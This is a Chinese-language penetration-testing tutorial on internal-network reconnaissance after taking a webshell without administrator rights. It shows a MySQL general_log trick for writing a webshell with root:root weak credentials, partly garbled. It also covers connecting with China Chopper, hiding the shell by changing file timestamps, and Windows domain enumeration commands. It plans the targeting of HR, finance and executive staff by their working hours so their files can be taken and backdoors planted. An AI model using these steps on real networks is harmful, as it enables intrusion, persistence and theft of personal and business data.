內網信息收集篇

0x01 前情提要

在內網環境中，信息收集尤為重要。（通過多種協議）探測內網存活主機也屬于信息收集的一部分。

案例如下：非 root/administrator 下主動信息搜集

此 webshell 這樣獲取的：

1、通過掃端口，發現某站 8980 端口存在 http 服務；

2、在此端口爆破目錄，發現存在 phpStudy 探針文件，獲取 web 目錄的絕對路徑； D:/phpStudy4IIS/WWW。在此探針文件下用 root:root 弱密碼進行 MYSQL 檢測，發現嘗試成功；

3、另外此端口還有 phpMyAdmin 目錄，用 root:root 登陸進去；

4、使用 general_log 方法對 mysql 寫入一句話木馬：

1. setglobal general_log='on'
2. setglobal general_log_file='D:\\phpStudy4IIS\\WWW\\slow_log.php'#一定要使用 '\\'
3. select""

5、菜刀連 domain:8980/log.php angel

6、連上之后做一些基本的隱蔽目錄、更改文件時間等隱蔽化操作。

當前權限為：

在得到一個 webshell 時，非 root/administrator 情況下對目標信息搜集至關重要，它會影響后期的滲透是否順利，以及滲透方向。

0x02 信息收集

1、獲取內網 IP

注：有的目標主機會分配 2 個內網 IP ，如 10.x.x.x 與 192.168.x.x。

2、獲取服務軟件與殺軟

得知部分服務軟件，以及殺毒軟件 360 全套，一般內網中為殺毒為集體一致。

3、搜集補丁更新頻率，以及系統狀況

如果目標機器上補丁過多，加上殺軟齊全，就應該考慮放棄 exp 提權。

原因1：需要更多的時間消耗在對反病毒軟件對抗。

原因2：目標機補丁過多，需要消耗更多的時間。

原因3：可能因為某些 exp 導致藍屏從而丟失權限。

此種情況下示例提權思路：如目標機器上安裝了 mysql，并與內網其中一臺建立大量連接。就可以考慮 mysql udf 提權。

單個補丁安裝情況查詢：

1. systeminfo>snowming.txt&(for%i in(KB4519572 KB4287903 KB4287904)do@type snowming.txt|@find/i "%i"||@echonothis padding:%i)&del/f /q /a snowming.txt

注：以上需要在可寫目錄執行。需要臨時生成 snowming.txt，以上補丁編號請根據環境來增、刪。

4、搜集安裝軟件以及版本，路徑等

1. wmic product > insformation.txt

1. powershell "Get-WmiObject -class Win32_Product |Select-Object -Property name,version"

5、獲取域組、用戶

獲取全部域用戶：

1. net user /domain

獲取域分組：

1. net group/domain

在域組中，其中有幾個組需要特別關注：

1. IT組/研發組：他們掌握在大量的內網密碼，數據庫密碼等。

2. 秘書組：他們掌握著大量的目標機構的內部傳達文件，為信息分析業務提供信息，在反饋給技術業務來確定滲透方向。

3. Domain Admins 組：root/administrator

4. 財務組：他們掌握著大量的資金往來與目標企業的規劃發展，并且可以通過資金，來判斷出目標組織的整體架構。

5. CXX 組，如ceo，cto，coo等。不同的目標組織名字不同，如部長，廠長，經理等。

6. HR 組：他們的電腦中有大量人事信息，商業秘密等。

以 Domain Admins 組為例，開始規劃信息探測等級：

1. 【等級1】確定某部門具體人員數量；
2. 【等級2】確定該部門的英文用戶名的具體信息，如姓名，聯系方式，郵箱，職務等。以便確定下一步攻擊方向；
3. 【等級3】分別探測白天/夜間內網中所存活機器并且對應IP地址；
4. 【等級4】對應人員的工作機內網IP，以及工作時間；
5. 【等級5】根據信息業務反饋，制定目標安全時間，以便拖拽指定人員文件，或登錄目標機器；
6. 【等級6】制定目標機器后滲透與持續滲透的方式以及后門。

探測等級1：

1. net group"Domain Admins"/domain

探測等級2：

1. for/f %i in(1.txt)do net user %i /domain >>user.txt

注：1.txt 為上一步收集到的用戶名：

后面可以結合 meterpreter 獲取反彈 shell、測試內網段在線主機、獲取主機操作系統信息、獲取端口服務開放情況等。

注：可以在不同的時段（白天/晚上）探測內網段在線主機。

0x03 總結

本文中探討了非 root/administrator 用戶下的主動信息搜集。

在 iis appool\defaultappool 的權限下，逐步獲取了如下信息：

1. 該目標內網分配段
2. 安裝的軟件
3. 殺毒軟件情況
4. 端口開放情況
5. 運行的服務
6. 補丁情況
7. 管理員上線操作時間段
8. 域用戶詳細信息（英文 user 對應的職務，姓名等）
9. 根據域內分組可以進一步確定攻擊方向。如秘書組，如 hr 組等。

進一步提權可以結合運行的服務，如 mysql 提權。